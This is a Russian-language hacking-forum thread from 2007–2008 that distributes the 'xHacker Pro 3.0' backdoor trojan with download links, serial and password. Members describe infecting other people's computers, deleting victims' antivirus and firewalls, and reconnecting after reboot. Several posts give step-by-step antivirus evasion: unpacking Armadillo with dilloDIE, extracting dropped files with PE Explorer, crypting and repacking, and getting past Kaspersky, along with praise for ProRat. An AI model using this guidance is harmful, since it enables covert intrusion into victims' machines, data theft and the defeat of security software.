PDA

Просмотр полной версии : xHacker Pro 3.0, Backdoor


Mo4x
06.10.2007, 01:36
http://img267.imageshack.us/img267/7237/hackzr1.jpg

http://img516.imageshack.us/img516/5203/scan1mu9.jpg

User Name: Tom
Serial Number: 5233-19EB-A71C-C481
Password: ForTomAllen

Download тут. (http://rapidshare.com/files/55646879/xHacker.3.ForTomAllen.rar)

Zolden
07.10.2007, 13:09
Не понял как его настраивать... У кого есть мануал, поделитесь...

GALIAFF
07.10.2007, 16:13
Перезалейте пожалуйста куда - нибудь в другое место

Zolden
07.10.2007, 22:36
Перезалейте пожалуйста куда - нибудь в другое место
http://slil.ru/24948122
юзай ссыль =)

lsass.exe
07.10.2007, 23:13
Перезалейте пожалуйста куда - нибудь в другое место
http://depositfiles.com/files/1989096

Zolden
09.10.2007, 23:50
Замутил видео мануал по настройке этой программки =)

http://slil.ru/24958657

htp://xhacker.download-area51.com

А можно узнать, откуда была скачана программа и где ее можно купить?

Lynx83
01.11.2007, 16:31
Люди, подскажите из-за чего может быть такой глюк.
Есть два человека, оба запустили у себя сервер xhacker'a. Один в Москве, другой в Харькове. Могу подключиться к обоим, останавливать процессы, рыться в реестре, но у того, кто в Москве я могу спокойно скачивать файлы, а у того, кто в Харькове нет. Серверы у обоих одинаковые установлены. У того, кто в Харькове, нет ни фаервола, ни антивира (я снес их через тот же xhacker, был обычный виндосовский брендауэр и dr.web). Почему у одного файлы качаются, у другого нет? (хотя я их вижу через файл-менеджер, вижу их размер, аттрибуты)

Zolden
01.11.2007, 17:27
У Москвича, при запуске сработал антивирь, и удалил файл который отвечает за скачивание файлов. Такой же случай был и у меня... Аналогично происходит и с prorat.

Lynx83
01.11.2007, 17:47
Спасиб за объяснение.
Т.е. вопрос можно решить, впарив второй раз тот же сервер xhacker'a, предварительно остановив все брендмауэры и антивиры? или уже неполучится?
P.S. - у prorat есть оф сайт?

kendybober
01.11.2007, 18:58
_prorat.net

Jey
03.11.2007, 19:50
Скачал троян, скачал видео-мануал...
Возник ток один ворос.. хост с которого будут приходить репорты... это Ip жертвы?

Заранее спасибо...

Chich
03.11.2007, 23:13
Перезалейте видео куданить в другое место плз

Jey
03.11.2007, 23:24
http://dump.ru/files/n/n402605520/ Держи

_Sniper_
04.11.2007, 11:47
Криптуеться? Если да то чем? =)

Zolden
04.11.2007, 15:29
Криптуеться? Если да то чем? =)
Криптуется, но при запуске может не запуститься, а если запустится то спалятся файлы которые копируются в системную директорию.

AlexDee
04.11.2007, 21:19
Отдуши, софтина супер!!! Респект

gizmo
04.11.2007, 21:24
почему люди жалуются на ссыль в первом посте? или ее уже подправили?

Zolden
04.11.2007, 21:25
Отдуши, софтина супер!!! Респект
Неужели криптануть удалось?

AlexDee
05.11.2007, 19:38
Нет, я не пробовал криптовать, просто протестил на одном типе. Мне понравилось то что не надо пробивать ip чтоб приконектится к серваку, ща буду криптовать всем что есть и смареть на работоспособность =) впереди ещё целая ночь!

Zolden
05.11.2007, 21:08
Нет, я не пробовал криптовать, просто протестил на одном типе. Мне понравилось то что не надо пробивать ip чтоб приконектится к серваку, ща буду криптовать всем что есть и смареть на работоспособность =) впереди ещё целая ночь!
Постарайся криптануть! Если получится, буду очень признателен!

AlexDee
07.11.2007, 11:32
Испытал окола 15 криптеров, кароч шляпа это либо палится, либо не работает :(

onikishov
07.11.2007, 14:12
AlexDee, тебе помогут только приватные крипторы, тобишь за денюшку, а так все остальные конечно же палятся.

AlexDee
08.11.2007, 01:00
AlexDee, тебе помогут только приватные крипторы, тобишь за денюшку, а так все остальные конечно же палятся.
Себе то я криптанул, но хотел помочь, людям, не у всех же есть приватный софт ;)

kondrat
08.11.2007, 08:28
Тоже не понял насчет хоста с которого должны приходить репорты, обьясните что к чему

timphp
08.11.2007, 15:35
Парни выложите кто нибудь NO-IP DUC v.2.2.1

Zolden
08.11.2007, 19:16
Себе то я криптанул, но хотел помочь, людям, не у всех же есть приватный софт ;)
А чем криптанул то?

Chich
09.11.2007, 22:58
А этот троян в авотозагрузку прописывается? А то у меня повторный сигнал не идет с троя. незнаю в чем трабла мож поможите

Zolden
09.11.2007, 23:32
Данный коняжка в автозагрузку к сожалению лезет =(

Chich
10.11.2007, 01:07
Млин бред я у себя запустил коня после перезакрузки все норма в окне Sin мой комп есть.А вот я кинул другу по тестить так в окне Sin есть его комп а посли перезагрузки моего компа в окне Sin его компа нету есть тока мой.Так почему его комп больше не появляется?у него нет антивира и фаера.Почему так?

Zolden
10.11.2007, 01:33
Любой софт не идеален.
Это может зависить от провайдера, от его машины...
У меня такое же случалось. Но зачем тебе надо видеть компьютер жертвы постоянно? Если ломать кого, то ломать сразу и быстро, а оставлять на потом думаю не актуально.

Nightmarе
10.11.2007, 03:17
Не подстава??? а то заюзаю а там ещё чё... кстати ничем не упакован???

Zolden
10.11.2007, 12:43
Upx - ом вроде упакован

Lamia
10.11.2007, 16:49
Армадиллой он упакован однако!И самый простой способ что б его закриптовать,то нужно сначало снять арму,но не у того файла - дроппера,что выплевывает билдер,а у того ,что будет находиться
в той дирректории ,что была указана при настройках!Затем криптуем каким либо криптором ,например FreeCryptor от GLOFF ,к сожелению каспером палится и пакуем например аспаком.В результате и файлик становится меньше,непалится большенством антивирей и нормально работает,по крайней мере локально!Вот если только потом захотите зарядить его какому нить юзьверю,то придётся уже самому искать пути,как поместить его в нужную папку,а так же вероятно и для того что б он загружался впоследствии,но я не особо разбиралась!Сам же копироваться он уже не будет!А так же можно снять арму и с остальных файлов.
и тогда не надо будет вводить пароль каждый раз заного!

zetrox_95
13.11.2007, 04:25
Вот проблемка у меня! На видео мануале, Zolden настраивает на виртуалке Backdoor, а трой то, этот работает через интернет, если да дайте мануал видео по настройке!

Zolden
13.11.2007, 14:01
Вот проблемка у меня! На видео мануале, Zolden настраивает на виртуалке Backdoor, а трой то, этот работает через интернет, если да дайте мануал видео по настройке!
Я создаю трояна на обычном компе, и закидываю на виртуалку. И виртуалка и обычный ПК подключены к инету.

zetrox_95
15.11.2007, 06:24
Я создаю трояна на обычном компе, и закидываю на виртуалку. И виртуалка и обычный ПК подключены к инету.

Я все понял, что ты делал на компе, заразил виртуалку, я сам приписывая localhost заражал себя, кидал его в Lan сеть, тестил трой, все работает путем, вот только две проблемы! Заражая комп жертвы, трой не коннектиться через интернет, может я не правильно настраиваю? :rolleyes: Вторая проблема с трояном, он не убивает с процессов Kaspersky 7.0, что тут говорить про убийство, :) трой даже не останавливает постоянную защиту, хотя эти функции присуствуют в нем. :(

superboy4
27.11.2007, 23:27
А ЧЁРТ, Avp-шник палит!!

Belfigor
14.12.2007, 07:25
Я все понял, что ты делал на компе, заразил виртуалку, я сам приписывая localhost заражал себя, кидал его в Lan сеть, тестил трой, все работает путем, вот только две проблемы! Заражая комп жертвы, трой не коннектиться через интернет, может я не правильно настраиваю? :rolleyes: Вторая проблема с трояном, он не убивает с процессов Kaspersky 7.0, что тут говорить про убийство, :) трой даже не останавливает постоянную защиту, хотя эти функции присуствуют в нем. :(

Это говорит о том что ProRat Se 1.9 рулит , переюзал много разных версий троянов , имхо Крыс самый лучший ;)

Zolden
17.12.2007, 23:39
Это говорит о том что ProRat Se 1.9 рулит , переюзал много разных версий троянов , имхо Крыс самый лучший ;)
Согласен, единственный RAT к которому есть патч блокирующий выброс DLL файлов... Но опять таки, нужен обход проактивной защиты (будь она не ладна), но не исключаем что не все же юзают каспера, и прочие мощные защиты

Mo4x
18.12.2007, 01:23
Bеlfigor-про рат рулит но всежи укаждой софтины есть сваи +и - .

Belfigor
20.12.2007, 17:47
Согласен, единственный RAT к которому есть патч блокирующий выброс DLL файлов... Но опять таки, нужен обход проактивной защиты (будь она не ладна), но не исключаем что не все же юзают каспера, и прочие мощные защиты

Так вот наглядный сегодняшний пример " криптонул сервак прората , через радмина переправил , через телнет запустил , смотрю , сервак выплюнул dll , сработал Каспер 7 , вижу юзер нажал удалить диллы , и каспер ему мол файлы вылечил (неизлечимые удалил), нужно рестануться , ... после рестарта ПРЕКРАСНО ПОДРУБИЛСЯ к челу :D , за слова отвечаю , и тут на форуме уже было сказано , что прорат превосходно работает и без dll , пусть паляться , главное , что сам трой в системе и работает на 5+ ;)

Mo4x
21.12.2007, 00:20
Как так он без dll пашет.

CyberTm
21.12.2007, 01:01
В Dll вроде ток кейлог и еще что-то))

Mo4x
21.12.2007, 19:26
Belfigor

что прорат превосходно работает и без dll , пусть паляться , главное , что сам трой в системе и работает на 5+

Для чего используется DLL?

Эта шпионская функция используется для того чтоб из
списка процессов трои прятать и не только в списке
процессов но и в Ctrl Alt Del так что dll'ка нужна серано
но всёж кому как.

Belfigor
23.12.2007, 05:47
В Dll вроде ток кейлог и еще что-то))

да верно , он выплёвывает winkey.dll Trojan.KeyLogger и reginv.dll

Belfigor
23.12.2007, 05:55
Belfigor



Для чего используется DLL?

Эта шпионская функция используется для того чтоб из
списка процессов трои прятать и не только в списке
процессов но и в Ctrl Alt Del так что dll'ка нужна серано
но всёж кому как.

2 Mo4x я сделал не большое видео , если у тебя безлим , то можешь качнуть , в процессах у меня он весит как system(как назавёшь файло так и весит ;) я просто не знаю как доказать правдивость выше написанного , видео весит 8м :( и так сжал 58м до 8 , так что уж не обессутьте .

зы , но трой рабочий на все 5+ , то есть все функции он выполняет ;) видео http://slil.ru/25273312

CyberTm
24.12.2007, 20:42
Скажите а кто нить до сих пор бесплатно криптует?

Belfigor
25.12.2007, 05:48
Скажите а кто нить до сих пор бесплатно криптует?

а самому что не судьба криптонуть ? :D

Zolden
26.12.2007, 01:29
а самому что не судьба криптонуть ? :D
Каким образом он криптанет? Возможно что у него нету криптора

Belfigor
26.12.2007, 16:24
Каким образом он криптанет? Возможно что у него нету криптора

в разделе "Крипторы" и "Джойнеры" есть полностью бесплатные и рабочие крипторы от "Gloff" :)

Zolden
27.12.2007, 21:56
в разделе "Крипторы" и "Джойнеры" есть полностью бесплатные и рабочие крипторы от "Gloff" :)
Да, только есть один нюанс, рабочие крипторы от Gloff, это все хорошо, но у них нету фичи, для установки обхода проактивной защиты того же касперского, так что если он захочет комунибудь насолить при помощи этого бэкдора, ему придется удостовериться о наличии антивируса на компьютере жерты

_Sniper_
28.12.2007, 22:16
Крипторы рабочие но хакер выбивает ошибку запуска..

Mo4x
29.12.2007, 13:29
Вобщето ребятишки советую вам поюзать крипторы каторые прачут dll так как каспер длл палет авоть сам сервак можно и криптором от глофа спратоть и не каких ошибок вылетать не будет.

Lamia
30.12.2007, 01:54
Вобщето ребятишки советую вам поюзать крипторы каторые прачут dll так как каспер длл палет авоть сам сервак можно и криптором от глофа спратоть и не каких ошибок вылетать не будет.
Линк в студию...Плизз

И может,прежде чем криптовать вы армадиллу с сервера снимите и тогда и ошибок не будет!

Mo4x
30.12.2007, 14:20
Криптор сам ищи тимболие денег тебе на него нехватет такое удавольствие стоет не слабо.

Lamia
30.12.2007, 20:18
Криптор сам ищи тимболие денег тебе на него нехватет такое удавольствие стоет не слабо.
Хех! :) Откуда тебе любезный знать,хватит мне денег или нет!Ты ответь по существу,назови хотя бы такие крипторы!

Mo4x
30.12.2007, 20:28
Стучи в аську.

Soviet[HZ]
05.01.2008, 12:56
Есть ведь куча статей) Даже когда то видел описание криптовки связкой паблик крипторов. Гиморно конечно, но при определённом навыке работоспособность сохранялась.

x_iLLuSiOn
09.01.2008, 01:46
у меня ни с собой ни с кем не работает, коннектится, а ни одной функции тупо не выполняет.. :/

Lordick
01.02.2008, 20:29
Драсьте.
не могу понять одного во всех прорат-подобных троянах. ведь они выплёвывают всевозможные ехе-шники в разные системные папки, каторые есессно паляцо. даже если закриптовать билдер, они все равно буду палицо.
возникает вопрос: как можно закриптовать все сразу? то есть и сервер, и выплевываемые ехе-шники.

a1ex
02.05.2008, 22:25
Актуален ли он на сегодняшний день?
Или может есть обновления или что-то лутче?(прошу совет)

p.s.заранее благодарен.

nepster
02.05.2008, 22:34
Драсьте.
не могу понять одного во всех прорат-подобных троянах. ведь они выплёвывают всевозможные ехе-шники в разные системные папки, каторые есессно паляцо. даже если закриптовать билдер, они все равно буду палицо.
возникает вопрос: как можно закриптовать все сразу? то есть и сервер, и выплевываемые ехе-шники.
Криптовать сначала файлы , которые он создает , а потом сам трой. Легко и просто.

Angel.M
05.05.2008, 19:17
Драсьте.
не могу понять одного во всех прорат-подобных троянах. ведь они выплёвывают всевозможные ехе-шники в разные системные папки, каторые есессно паляцо. даже если закриптовать билдер, они все равно буду палицо.
возникает вопрос: как можно закриптовать все сразу? то есть и сервер, и выплевываемые ехе-шники.
я нашёл способ :)
Итак что понадобиться:
PE Explorer,PeID(качаем с cracklab.ru) и dilloDIE ссылка (http://88.80.194.49/~cip/re/index.php?page=tools_list&cat=owncoded)
ну как создать сервер я надеюсь вы знаете))
Сервер упакован Armadillo и вручную его распаковать очень сложно,поэтому я воспользовался автоматическим распаковщиком dilloDIE 1.6
Запускаем dilloDie и выбираем файл server.exe(в моём случае) ждём пару минут…итак файл распаковался.
Открываем получёный файл в PE Explorer
http://img.pixs.ru/images/5BMP_4920635_46369.bmp (http://pixs.ru/?ref=46369)
Сохраняем файл 101(сохраняеться почемуто как GUSTOM_101) в какуюнибудь папку и также распаковываем dilloDIE.теперь бэкдор можно нормально криптовать и он некидает .exe файлы в сис.директории

nepster
05.05.2008, 23:37
Могу дать ссылки на видео , где криптуется трой Turkojan. Этот трой тоже выплевывает длл файлы , и я их криптанул удачно. Для этого вируса просто надо будет аналагично сделать.

Olegros911
06.05.2008, 00:47
Дайте нормальную ссилку на трой,ато ниодна не пашет